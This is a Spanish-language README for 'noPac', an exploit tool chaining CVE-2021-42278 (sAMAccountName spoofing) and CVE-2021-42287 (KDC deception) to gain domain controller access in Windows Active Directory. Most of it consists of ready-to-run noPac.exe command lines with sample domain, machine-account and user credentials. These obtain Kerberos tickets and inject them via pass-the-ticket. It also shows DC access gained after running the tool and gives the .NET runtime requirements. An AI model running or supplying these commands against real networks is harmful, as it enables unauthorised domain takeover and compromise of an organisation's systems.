
CVE-2021-42287/CVE-2021-42278 Explotador
Este proyecto nace del estudio del principio de noPac, y se han realizado algunos cambios sobre la base del proyecto de cube0x0. Se han agregado comentarios personales de comprensión en el código fuente.
El análisis de la vulnerabilidad se puede consultar en mi artículo del blog: noPac 分析
noPac es la combinación de dos vulnerabilidades: CVE-2021-42278 (suplantación de sAMAccountName) y CVE-2021-42287 (engaño al KDC). Solo es posible explotarla si ambas vulnerabilidades se cumplen simultáneamente.
Ejemplos: Obtener TGT y ST
noPac.exe /domain NombreDelDominio /dc ControladorDeDominio /mAccount CuentaDeMaquina /mPassword ContraseñaDeMaquina /user UsuarioDelDominio /pass ContraseñaDelUsuario
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei
noPac.exe /domain NombreDelDominio /dc ControladorDeDominio /mAccount CuentaDeMaquina /mPassword ContraseñaDeMaquina /user UsuarioDelDominio /pass ContraseñaDelUsuario /service servicioalternativo
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs
Ejemplos: PTT
noPac.exe /domain NombreDelDominio /dc ControladorDeDominio /mAccount CuentaDeMaquina /mPassword ContraseñaDeMaquina /user UsuarioDelDominio /pass ContraseñaDelUsuario /service servicioalternativo /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
El método más común es PTT:
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt
Antes de usar noPac, no se tiene acceso al DC.

Usando noPac.
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Después de PTT, se puede acceder al DC nuevamente desde la ventana actual con éxito.

Tenga en cuenta que el programa solo se ejecuta en máquinas con entorno .NET 4.0+. Windows Server 2012 incluye .NET 4.0 de forma predeterminada; Windows Server 2008 incluye .NET 3.5 de forma predeterminada.
Para ver la versión de .NET instalada en la máquina:
dir c:\Windows\Microsoft.NET\Framework64
